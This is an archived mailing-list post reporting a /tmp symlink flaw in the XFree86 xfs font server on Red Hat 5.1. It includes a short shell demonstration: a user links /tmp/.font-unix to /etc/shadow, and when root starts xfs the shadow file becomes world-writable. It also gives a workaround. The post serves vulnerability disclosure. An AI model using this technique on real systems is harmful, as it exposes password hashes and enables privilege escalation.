Bug in xfs

lukaszLT.WSISIZ.EDU.PL

• Messages sorted by: [ date ][ thread ][ subject ][ author ]
• Next message: Ryan Russell: "Re: Possible security hole"
• Previous message: Eddie Eddie: "Re: icq DOS / possible "stupid user" vulnerability."
• Next in thread: Matthieu Herrb: "Re: Bug in xfs"

Hello,

I hope that's information will be useful for making new patch for
XFree86.

I found bug in xfs

(Packet XFree86-xfs-3.3.3.1-1 in RedHat 5.1 and probably in RedHat 5.2
updates, too)
Xfs is a font server for XFree86, it's also create directory in /tmp
That directory name .font-unix

Let's make a little check:

On first console (I logged as a normal user)

[lukaszlt /tmp]$ cat /etc/shadow
cat: /etc/shadow: Permission denied

[lukaszlt /tmp]$ ls -all /etc/shadow
-r--------   1 root     root          544 Mar 30 00:04 /etc/shadow

[lukaszlt /tmp]$ ll
total 2
drwxrwxrwt   2 root     root         1024 Mar 30 00:05 .
drwxr-xr-x  18 root     root         1024 Mar 23 00:10 ..
lrwxrwxrwx   1 lukasz   users          11 Mar 30 00:05 .font-unix ->
/etc/shadow

On second console, as root

[rootlt /root]# xfs &
[1] 2021
[rootlt /root]# _FontTransSocketCreateListener: failed to bind listener
_FontTransSocketUNIXCreateListener: ...SocketCreateListener() failed
_FontTransMakeAllCOTSServerListeners: failed to create listener for local


On first console:

[lukaszlt /tmp]$ ls -all /etc/shadow
-rwxrwxrwt   1 root     root          544 Mar 30 00:04 /etc/shadow
^^^^^^^^^^^
That's all ;)

Solution, As root before run xfs, make rm -rf /tmp/.font-unix


Sorry for my broken English ;(


                    _[   Lukasz Trabinski   ]_
PgP Key: finger:lukaszoceanic.wsisiz.edu.pl, SysAdmin wsisiz.edu.pl

• Next message: Ryan Russell: "Re: Possible security hole"
• Previous message: Eddie Eddie: "Re: icq DOS / possible "stupid user" vulnerability."
• Next in thread: Matthieu Herrb: "Re: Bug in xfs"